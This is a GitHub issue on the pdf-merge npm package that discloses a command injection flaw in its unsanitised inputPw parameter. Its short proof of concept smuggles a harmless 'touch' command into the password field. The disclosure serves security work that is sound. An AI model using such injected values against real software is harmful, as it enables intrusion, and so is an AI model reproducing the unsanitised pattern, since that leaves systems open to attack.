search

wubzz / pdf-merge

Merge multiple PDF Files into a single PDF document
127 stars 32 forks source link

Potential command injection vulnerability in pdf-merge #42

Open qCVE opened 2 years ago

qCVE commented 2 years ago

Hi,

Thanks for developing this great npm package! We find a potential command injection vulnerability from it. The bug is introduced because package-exported method fails to sanitize the inputPw parameter and let it flow into a sensitive command execution API.

Here is the proof of concept.

const PDFMerge = require('pdf-merge');
const files = [
        `${__dirname}/1.pdf`,
        `${__dirname}/2.pdf`,
        {file: `${__dirname}/protected.pdf`, inputPw: '_SeCrEt_ | touch command_injection'}

];

 PDFMerge(files);